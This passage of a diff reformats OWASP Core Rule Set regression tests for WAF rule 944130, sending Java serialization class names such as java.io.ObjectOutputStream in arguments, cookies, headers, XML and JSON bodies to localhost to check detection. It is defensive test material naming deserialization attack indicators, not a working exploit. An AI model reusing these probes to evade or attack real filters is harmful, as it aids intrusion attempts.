\"944130\"" - - test_title: 944130-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 182 desc: "XML attribute value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 183 desc: "XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 184 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 185 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 186 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ObjectOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 187 desc: "Content-Type application/json arg 
name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ObjectOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 188 desc: "Argument test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 189 desc: "Argument name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 190 desc: "Cookie test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 191 desc: "Cookie name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.OutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 192 desc: "Request header test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.OutputStream - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 193 desc: "XML attribute value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 194 desc: "XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" 
- Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 195 desc: "Nested XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 196 desc: "Content-Type text/plain includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 197 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.OutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 198 desc: "Content-Type application/json arg name includes keyword 
java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.OutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 199 desc: "Argument test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 200 desc: "Argument name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 201 desc: "Cookie test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 202 desc: "Cookie name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 203 desc: "Request header test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: 
java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 204 desc: "XML attribute value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 205 desc: "XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 206 desc: "Nested XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 207 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 208 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": 
